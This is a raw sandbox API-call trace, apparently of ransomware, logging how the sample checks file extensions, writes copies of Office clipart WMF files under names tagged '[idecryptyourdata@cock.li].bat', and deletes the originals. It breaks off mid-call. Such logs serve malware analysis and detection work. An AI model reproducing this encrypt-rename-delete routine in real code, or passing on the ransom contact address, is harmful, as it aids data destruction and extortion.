[0064.040] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF") returned 64 [0064.040] lstrlenW (lpString=".dbf") returned 4 [0064.040] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF") returned 64 [0064.040] lstrlenW (lpString=".1cd") returned 4 [0064.040] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF") returned 64 [0064.040] lstrlenW (lpString=".jpg") returned 4 [0064.040] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.040] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.040] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.040] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00135_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0064.041] GetLastError () returned 0x0 [0064.041] ReadFile (in: hFile=0x340, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x414, lpOverlapped=0x0) returned 1 [0064.078] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x420, lpOverlapped=0x0) returned 1 [0064.078] ReadFile (in: hFile=0x340, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.079] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.079] SetEndOfFile (hFile=0x384) returned 1 [0064.079] CloseHandle (hObject=0x384) returned 1 [0064.080] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.080] SetEndOfFile (hFile=0x340) returned 1 [0064.081] CloseHandle (hObject=0x340) returned 1 [0064.081] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.081] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00135_.wmf")) returned 1 [0064.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 68 [0064.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 68 [0064.083] lstrlenW (lpString=".doc") returned 4 [0064.083] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.083] lstrlenW (lpString=".docx") returned 5 [0064.083] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.083] lstrlenW (lpString=".pdf") returned 4 [0064.083] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.083] lstrlenW (lpString=".xls") returned 4 [0064.083] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.083] lstrlenW (lpString=".xlsx") returned 5 [0064.083] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.083] lstrlenW (lpString=".ppt") returned 4 [0064.083] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 68 [0064.083] lstrlenW (lpString=".zip") returned 4 [0064.083] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.083] lstrlenW (lpString=".rar") returned 4 [0064.083] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.083] lstrlenW (lpString=".bz2") returned 4 [0064.083] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.083] lstrlenW (lpString=".7z") returned 3 [0064.083] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 68 [0064.084] lstrlenW (lpString=".dbf") returned 4 [0064.084] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 68 [0064.084] lstrlenW (lpString=".1cd") returned 4 [0064.084] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 68 [0064.084] lstrlenW (lpString=".jpg") returned 4 [0064.084] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.097] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.097] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.097] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00186_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0064.100] GetLastError () returned 0x0 [0064.100] ReadFile (in: hFile=0x340, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x31f4, lpOverlapped=0x0) returned 1 [0064.121] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x3200, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x3200, lpOverlapped=0x0) returned 1 [0064.122] ReadFile (in: hFile=0x340, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.122] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.122] SetEndOfFile (hFile=0x384) returned 1 [0064.122] CloseHandle (hObject=0x384) returned 1 [0064.124] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.124] SetEndOfFile (hFile=0x340) returned 1 [0064.125] CloseHandle (hObject=0x340) returned 1 [0064.125] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.125] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00186_.wmf")) returned 1 [0064.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 68 [0064.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 68 [0064.127] lstrlenW (lpString=".doc") returned 4 [0064.128] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.128] lstrlenW (lpString=".docx") returned 5 [0064.128] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.128] lstrlenW (lpString=".pdf") returned 4 [0064.128] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.128] lstrlenW (lpString=".xls") returned 4 [0064.128] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.128] lstrlenW (lpString=".xlsx") returned 5 [0064.128] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.128] lstrlenW (lpString=".ppt") returned 4 [0064.128] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 68 [0064.128] lstrlenW (lpString=".zip") returned 4 [0064.128] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.128] lstrlenW (lpString=".rar") returned 4 [0064.128] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.128] lstrlenW (lpString=".bz2") returned 4 [0064.128] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.128] lstrlenW (lpString=".7z") returned 3 [0064.128] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 68 [0064.128] lstrlenW (lpString=".dbf") returned 4 [0064.128] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 68 [0064.128] lstrlenW (lpString=".1cd") returned 4 [0064.128] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 68 [0064.128] lstrlenW (lpString=".jpg") returned 4 [0064.128] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.132] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.132] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.132] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00440_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0064.134] GetLastError () returned 0x0 [0064.134] ReadFile (in: hFile=0x344, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x15cc, lpOverlapped=0x0) returned 1 [0064.138] WriteFile (in: hFile=0x350, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x15d0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x15d0, lpOverlapped=0x0) returned 1 [0064.139] ReadFile (in: hFile=0x344, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.139] WriteFile (in: hFile=0x350, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.139] SetEndOfFile (hFile=0x350) returned 1 [0064.142] CloseHandle (hObject=0x350) returned 1 [0064.144] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.144] SetEndOfFile (hFile=0x344) returned 1 [0064.147] CloseHandle (hObject=0x344) returned 1 [0064.147] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.147] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00440_.wmf")) returned 1 [0064.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 68 [0064.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 68 [0064.147] lstrlenW (lpString=".doc") returned 4 [0064.147] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.147] lstrlenW (lpString=".docx") returned 5 [0064.147] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.147] lstrlenW (lpString=".pdf") returned 4 [0064.147] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.147] lstrlenW (lpString=".xls") returned 4 [0064.147] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.148] lstrlenW (lpString=".xlsx") returned 5 [0064.148] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.148] lstrlenW (lpString=".ppt") returned 4 [0064.148] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 68 [0064.148] lstrlenW (lpString=".zip") returned 4 [0064.148] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.148] lstrlenW (lpString=".rar") returned 4 [0064.148] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.148] lstrlenW (lpString=".bz2") returned 4 [0064.148] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.148] lstrlenW (lpString=".7z") returned 3 [0064.148] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 68 [0064.148] lstrlenW (lpString=".dbf") returned 4 [0064.148] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 68 [0064.148] lstrlenW (lpString=".1cd") returned 4 [0064.148] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 68 [0064.148] lstrlenW (lpString=".jpg") returned 4 [0064.148] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.149] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.149] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.149] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00443_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0064.149] GetLastError () returned 0x0 [0064.149] ReadFile (in: hFile=0x344, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x68c, lpOverlapped=0x0) returned 1 [0064.159] WriteFile (in: hFile=0x358, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x690, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x690, lpOverlapped=0x0) returned 1 [0064.160] ReadFile (in: hFile=0x344, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.160] WriteFile (in: hFile=0x358, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.160] SetEndOfFile (hFile=0x358) returned 1 [0064.160] CloseHandle (hObject=0x358) returned 1 [0064.162] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.162] SetEndOfFile (hFile=0x344) returned 1 [0064.162] CloseHandle (hObject=0x344) returned 1 [0064.163] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.163] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00443_.wmf")) returned 1 [0064.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 68 [0064.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 68 [0064.163] lstrlenW (lpString=".doc") returned 4 [0064.163] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.163] lstrlenW (lpString=".docx") returned 5 [0064.163] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.163] lstrlenW (lpString=".pdf") returned 4 [0064.163] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.163] lstrlenW (lpString=".xls") returned 4 [0064.163] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.163] lstrlenW (lpString=".xlsx") returned 5 [0064.163] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.164] lstrlenW (lpString=".ppt") returned 4 [0064.164] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 68 [0064.164] lstrlenW (lpString=".zip") returned 4 [0064.164] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.164] lstrlenW (lpString=".rar") returned 4 [0064.164] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.164] lstrlenW (lpString=".bz2") returned 4 [0064.164] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.164] lstrlenW (lpString=".7z") returned 3 [0064.164] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 68 [0064.164] lstrlenW (lpString=".dbf") returned 4 [0064.164] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 68 [0064.164] lstrlenW (lpString=".1cd") returned 4 [0064.164] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 68 [0064.164] lstrlenW (lpString=".jpg") returned 4 [0064.164] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.173] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.173] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.173] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00445_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0064.175] GetLastError () returned 0x0 [0064.175] ReadFile (in: hFile=0x350, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0xed4, lpOverlapped=0x0) returned 1 [0064.178] WriteFile (in: hFile=0x340, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xee0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xee0, lpOverlapped=0x0) returned 1 [0064.179] ReadFile (in: hFile=0x350, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.179] WriteFile (in: hFile=0x340, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.180] SetEndOfFile (hFile=0x340) returned 1 [0064.182] CloseHandle (hObject=0x340) returned 1 [0064.183] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.183] SetEndOfFile (hFile=0x350) returned 1 [0064.184] CloseHandle (hObject=0x350) returned 1 [0064.184] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.184] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00445_.wmf")) returned 1 [0064.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 68 [0064.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 68 [0064.186] lstrlenW (lpString=".doc") returned 4 [0064.186] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.186] lstrlenW (lpString=".docx") returned 5 [0064.186] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.186] lstrlenW (lpString=".pdf") returned 4 [0064.186] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.186] lstrlenW (lpString=".xls") returned 4 [0064.186] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.186] lstrlenW (lpString=".xlsx") returned 5 [0064.186] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.186] lstrlenW (lpString=".ppt") returned 4 [0064.186] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 68 [0064.186] lstrlenW (lpString=".zip") returned 4 [0064.186] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.186] lstrlenW (lpString=".rar") returned 4 [0064.186] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.186] lstrlenW (lpString=".bz2") returned 4 [0064.186] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.186] lstrlenW (lpString=".7z") returned 3 [0064.186] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 68 [0064.186] lstrlenW (lpString=".dbf") returned 4 [0064.187] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 68 [0064.187] lstrlenW (lpString=".1cd") returned 4 [0064.187] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 68 [0064.187] lstrlenW (lpString=".jpg") returned 4 [0064.187] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.190] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.191] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.191] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01080_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0064.194] GetLastError () returned 0x0 [0064.194] ReadFile (in: hFile=0x350, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0xaac, lpOverlapped=0x0) returned 1 [0064.224] WriteFile (in: hFile=0x2c8, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xab0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xab0, lpOverlapped=0x0) returned 1 [0064.225] ReadFile (in: hFile=0x350, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, 